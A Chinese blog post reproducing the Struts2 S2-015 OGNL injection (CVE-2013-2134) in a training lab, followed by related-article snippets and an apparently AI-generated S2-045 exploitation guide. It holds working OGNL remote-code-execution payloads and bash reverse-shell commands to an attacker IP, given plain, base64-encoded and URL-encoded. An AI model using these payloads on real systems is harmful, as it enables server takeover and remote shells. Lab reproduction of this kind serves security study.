[漏洞复现]Apache Struts2/S2-015 (CVE-2013-2134)

最新推荐文章于 2024-12-31 10:00:00 发布
原创 最新推荐文章于 2024-12-31 10:00:00 发布 · 801 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#apache #struts #web安全 #安全

本文详细描述了一起针对ApacheStruts2的漏洞(CVE-2013-2135),涉及远程攻击者利用精心构造的请求执行任意OGNL代码。作者提供了漏洞复现步骤,包括payload构造和bash反弹shell实例,并给出了安全处置建议。
部署运行你感兴趣的模型镜像

一、漏洞情况分析

2.3.14.3 之前的 Apache Struts 2 允许远程攻击者通过带有在通配符匹配期间未正确处理的精心制作的操作名称的请求执行任意 OGNL 代码,这是与 CVE-2013-2135 不同的漏洞。

二、漏洞复现

春秋云境.com

进入靶场

开始复现

构造payload

/${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cmd').getInputStream()),#q}.action
 bash -i >& /dev/tcp/192.168.146.158/9999 0>&1
 base加密
 bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}
 url编码
 bash+-c+%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D

把我们url编码后的bash反弹shell放进去,接入我们的url域名后面,同时命令端开始监听

三、漏洞处置建议 

把靶场关了,跟漏洞说“白白吧

 

您可能感兴趣的与本文相关的镜像

Stable-Diffusion-3.5

Stable-Diffusion-3.5

图片生成
Stable-Diffusion

Stable Diffusion 3.5 (SD 3.5) 是由 Stability AI 推出的新一代文本到图像生成模型,相比 3.0 版本,它提升了图像质量、运行速度和硬件效率

[ vulhub漏洞复现篇 ] Struts2远程代码执行(S2-015)CVE-2013-2135)
qq_51577576的博客
11-19 1036
[ vulhub漏洞复现篇 ] Struts2远程代码执行(S2-015)CVE-2013-2135) Apache Struts 2是用于开发JavaEE Web应用程序的开源Web应用框架。Apache Struts 2.0.0至2.3.14.2版本中存在远程命令执行漏洞。远程攻击者可借助带有‘${}’和‘%{}’序列值(可导致判断OGNL代码两次)的请求,利用该漏洞执行任意OGNL代码。
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-013(CVE-2013-1966)
qq_51577576的博客
11-24 951
Struts2标签中和都包含一个includeParams属性,其值可设置为none、get 或 all,其对应意义分别为,none:链接不包含请求的任意参数值(默认),get:链接只包含GET请求中的参数和其值,all:链接包含GET和POST所有参数和其值.用来显示一个超链接,当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参数上.这个参数会进行OGNL表达式解析,从而可以插入任意OGNL表达式导致任意代码执行
Apache Struts Showcase App 2.0.0 到 2.3.13(在 2.3.14.3 之前的 Struts 2 中使用)远程代码执行漏洞CVE-2013-1965)
Flag少侠的博客
07-14 9847
打开靶场可以看到有一个输入框,尝试输入一些值提交值作为 name 参数拼接在 URL 后面如果不输入参数直接提交则会得到当前网页的完全路径复制路径打开 K8 工具工具下载pwd=6666使用 S2-016 获取信息成功执行命令获取 flagt=N7T8工具下载https://pan.baidu.com/s/1gAV9uzWZgmC3ojKNeKAjsQ?pwd=6666。
buuctf [struts2]s2-015
qq_1873822的博客
03-22 406
漏洞描述 基于通配符定义的动作映射,如果一个请求跟任何其他定义的操作不匹配,他将会匹配*,并且请求的同操作名称的jsp文件 https://blog.youkuaiyun.com/qq_45625605/article/details/103138548 将: http://node3.buuoj.cn:27791/welcome.action 改成: http://node3.buuoj.cn:27791/%25%7B1%2B1%7D.action POC %24%7B%23context%5B%27xwork.
Struts2 S2-015 远程代码执行漏洞CVE-2013-2135)
qq_68163788的博客
06-23 1049
Apache Struts 2是一个用于构建企业级Java Web应用程序的开源Web应用程序框架。它采用MVC(Model-View-Controller)模式,允许开发人员将业务逻辑、数据传输和用户界面分开,从而实现更好地组织和维护代码。Struts 2具有强大的功能,包括拦截器支持、表单验证、国际化、标签库、表单标记等,使开发人员能够快速构建功能丰富的Web应用程序。
春秋云镜 CVE-2013-2134
qq_22002773的博客
09-16 829
春秋云镜 CVE-2013-2134
[旧文系列] Struts2历史高危漏洞系列-part5:S2-052/S2-053/S2-057
mole_exp的博客
01-18 968
文章目录关于<旧文系列>前言S2-052漏洞复现与分析可回显PoC漏洞修复S2-053漏洞复现与分析可回显PoC漏洞修复S2-057漏洞复现与分析可回显PoC漏洞修复Reference 关于<旧文系列> <旧文系列>系列是笔者将以前发到其他地方的技术文章,挑选其中一些值得保留的,迁移到当前博客来。 文章首发于奇安信攻防社区: https://forum.butian.net/share/601 https://forum.butian.net/share/602 htt
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞 S2-005 (CVE-2010-1870)
qq_51577576的博客
10-14 1492
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞 S2-005 (CVE-2010-1870) s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12)struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391)
qq_51577576的博客
10-15 1633
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391) S2-008 涉及多个漏洞,主要利用对传入参数没有严格限制,导致多个地方可以执行恶意代码。 第一种情况其实就是 S2-007,在异常处理时的OGNL 执行第二种的cookie的方式,虽然在struts2没有对恶意代码进行限制,但是java的webserver(Tomcat),对cookie 的名称有较多限制,在传入struts2之前就被处理,从而较为鸡肋第三种需要开启devModedebug 模式。
Struts2_015_RCE CVE-2013-2134 漏洞复现
ADummy的博客
02-18 1384
Struts2_015_远程代码执行 by ADummy 0x00利用路线 ​ burpuite抓包—>修改payload—>重放包—>代码执行—>有回显 0x01漏洞介绍 ​ 如果在配置 Action 中 Result 时使用了重定向类型,并且还使用 ${param_name} 作为重定向变量,例如: <package name="S2-012" extends="struts-default"> <action name="user" class=
墨者学院_Apache Struts2远程代码执行漏洞(S2-015)复现
cc_de_csdn的博客
08-26 784
1.由题意得知靶场存在S2-15漏洞 2.使用struts2漏洞扫描工具对网站进行扫描发现存在漏洞 3.使用工具的远程代码执行功能,通过ls发现存在key文件,通过cat访问key文件得到key ...
08#墨者靶场-Apache Struts2远程代码执行漏洞(S2-015)复现
shy的博客
11-25 1602
墨者学习 By/shy014 背景介绍 某日,安全工程师"墨者"对一单位业务系统进行授权扫描,在扫描过程中,发现了某个业务系统使用Apache Struts2框架。并且该版本存在高危漏洞,...
S2-015-RCE(CVE-2013-2134&CVE-2013-2135)--vulhub
ccc_9wy的博客
12-31 346
struts2漏洞复现;S2-015;RCE;CVE-2013-2134CVE-2013-2135;反弹shell。
Apache Struts OGNL表达式注入漏洞
weixin_30693183的博客
06-07 1232
漏洞名称: Apache Struts OGNL表达式注入漏洞 CNNVD编号: CNNVD-201306-105 发布时间: 2013-06-07 更新时间: 2013-06-07 危害等级: 漏洞类型: 威胁类型: 远程 CVE编号: CVE-2013-2135 ...
漏洞复现Struts2-12远程命令执行
weixin_44647915的博客
04-25 3641
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 关于 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 一、环境准备 二、步骤 1. 2. 总结 提示:这里对文章进行总结: 例如:以上就是今天要讲的内容,本文仅仅简单介绍了pandas的使用,而pandas提供了大量能使我们快速便捷地处理数据的函数和方法。 ...
Maven Struts2
十年彩虹
09-10 709
org.apache.struts struts2-core ${struts.version} org.apache.struts struts2-json-plugin ${struts.version} org.apache.struts struts2-spring-plugin ${struts.version}
墨者Apache Struts2远程代码执行漏洞(S2-015)题解
zr1213159840的博客
01-08 3466
这题在网上搜索后,发现是这么进行操作的 首先在地址后面添加 ${1+2}.action 即访问 http://219.153.49.228:43186/${1+2}.action 发现存在回显 然后我们构造以下信息,访问当前的文件夹,发现key.txt %24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDecla
Struts2远程代码执行漏洞
m0_63241485的博客
08-16 1068
进入试验机,打开火狐终端firefox访问我们的靶机所在ip地址。通过whoami与id命令,对当前反弹shell的权限进行判断,这里为linux系统最高权限root用户权限.在Linux操作系统中,root的权限是最高的,也被称为超级权限的拥有者。普通用户无法执行的操作,root用户都能完成,所以也被称之为超级管理用户。在所有Linux系统中,系统都是通过UID来区分用户权限级别的,而UID为0的用户被系统约定为是具有超级权限。...
『Java安全Struts2 2.1.8.1 参数名OGNL注入漏洞S2-005(S2-003修复绕过)复现与浅析
Ho1aAs‘s Blog
08-24 1498
S2-005是S2-003的绕过,xwork更新到2.1.6版本;005新增了SecurityMamberAccess功能,但是可以被绕过。
Struts2 漏洞(S2-045/CVE-2017-5638)复现
最新发布
10-31
<think>我们参考提供的引用内容,特别是引用[4]和引用[5]来回答用户的问题。用户明确要求复现S2-045漏洞CVE-2017-5638)。 根据引用[4]:该漏洞影响范围是使用基于Jakarta插件的文件上传功能时,通过修改HTTP请求头中的Content-Type值来触发漏洞。 引用[5]给出了具体的利用代码,是一个OGNL表达式,用于执行系统命令(例如反弹shell)。 复现步骤: 1. 环境搭建:使用vulhub提供的环境,进入s2-045目录,启动环境。 2. 构造恶意请求:利用curl或其他工具发送一个HTTP请求,在Content-Type头中插入恶意的OGNL表达式。 3. 执行命令:OGNL表达式会执行任意系统命令,如计算233*233(用于验证)或者反弹shell。 具体步骤: 步骤1:搭建漏洞环境 - 假设已经安装好docker和vulhub漏洞库。 - 进入对应目录:`cd vulhub/struts2/s2-045` - 启动环境:`docker-compose up -d` 步骤2:验证漏洞存在(以执行计算233*233为例) - 构造恶意请求,将以下命令中的URL替换为实际目标URL(通常是8080端口) - 命令示例: ```bash curl -v -X POST http://目标IP:8080/ -H "Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(233*233))}" ``` - 如果漏洞存在,返回的响应中会包含233*233的计算结果(54289)。 步骤3:执行反弹shell(可选) - 需要将OGNL表达式中的命令替换为反弹shell的命令,并替换IP和端口。 - 注意:OGNL表达式中的特殊字符需要进行适当编码(如引号、重定向符号等)。 - 引用[5]中给出了一个反弹shell的OGNL表达式示例,但注意该示例中使用了`bash -i>&/dev/tcp/ip/port 0>&1`,需要将`ip`和`port`替换为攻击机的IP和监听端口。 - 示例代码(注意:实际使用需要将单引号内的命令替换,并确保整个表达式正确): ```bash %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyLjEvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} ``` - 上面的反弹shell命令采用了base64编码(编码内容为`bash -i >& /dev/tcp/192.168.12.1/9999 0>&1`),以避免特殊字符问题。实际使用时需要将IP和端口替换成攻击机的IP和端口,并重新编码(注意:base64编码后替换示例中的`YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyLjEvOTk5OSAwPiYx`)。 步骤4:在攻击机上开启监听 - 使用nc命令监听端口:`nc -lvp 9999` 步骤5:发送恶意请求 - 将构造好的恶意Content-Type头放入POST请求中发送到目标。 注意事项: 1. 复现环境为实验环境,请勿用于非法用途。 2. 复现完成后,关闭环境:`docker-compose down` 引用说明: [^4] 提供了漏洞描述和环境搭建方法。 [^5] 提供了具体的利用代码。 根据以上步骤,我们可以完成S2-045漏洞复现。 </think>### Struts2 漏洞复现(S2-045/CVE-2017-5638) 根据引用内容和漏洞复现最佳实践,步骤如下: #### 一、漏洞原理 该漏洞源于Jakarta文件上传插件的异常处理机制。当攻击者**恶意构造`Content-Type`请求头**时,Struts2会错误执行其中的OGNL表达式,导致远程代码执行(RCE)[^4][^5]。影响范围: - Struts 2.3.5 - 2.3.31 - Struts 2.5 - 2.5.10 #### 二、复现步骤 1. **环境搭建** 使用Vulhub靶场(需提前安装Docker): ```bash cd vulhub/struts2/s2-045 # 进入漏洞目录 docker-compose up -d # 启动环境 docker ps # 确认容器运行(默认端口8080) ``` 2. **验证漏洞存在性** 执行测试命令(计算`233*233`): ```bash curl -v -X POST http://目标IP:8080/ \ -H "Content-Type: %{(#nike='multipart/form-data').(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(233*233))}" ``` **预期结果**:响应中包含`54289`(即$233^2$的计算结果)[^5]。 3. **获取反向Shell(关键步骤)** 修改OGNL表达式执行反弹Shell: ```bash # 替换以下内容: # <ATTACKER_IP> = 攻击机IP # <PORT> = 监听端口 PAYLOAD='%{(#nike="multipart/form-data").(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context["com.opensymphony.xwork2.ActionContext.container"]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd="bash -c {echo,<BASE64_ENCODED_COMMAND>}|{base64,-d}|{bash,-i}").(#p=new java.lang.ProcessBuilder(#cmd)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))}' # 生成Base64编码的反弹Shell命令(示例): SHELL_CMD="bash -i >& /dev/tcp/<ATTACKER_IP>/<PORT> 0>&1" ENCODED_CMD=$(echo "$SHELL_CMD" | base64 | tr -d '\n') # 发送Payload curl -v -X POST http://目标IP:8080/ -H "Content-Type: $PAYLOAD" ``` **说明**:需提前在攻击机用`nc -lvp <PORT>`监听端口[^5]。 #### 三、防御建议 1. 升级到Struts 2.3.322.5.10.1+ 2. 禁用Jakarta文件上传插件 3. 在WAF中过滤异常`Content-Type`头(如包含`#`、`{`等符号) #### 复现注意事项 - 实验环境需隔离,避免影响真实系统 - Vulhub环境复现后关闭容器:`docker-compose down` - 反向Shell命令需根据目标系统调整(Windows/Linux) --- ### 相关问题 1. Struts2其他高危漏洞(如S2-005、S2-046)的利用原理有何异同? 2. 如何通过流量特征检测Struts2 OGNL注入攻击? 3. 除文件上传外,Struts2还有哪些常见攻击面? [^1]: vulhub漏洞复现篇:s2-046 [^2]: vulhub漏洞复现篇:S2-005 [^3]: Struts2(s2-045)漏洞分析 [^4]: vulhub漏洞复现篇:s2-045 [^5]: vulhub-Struts2-045漏洞复现
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值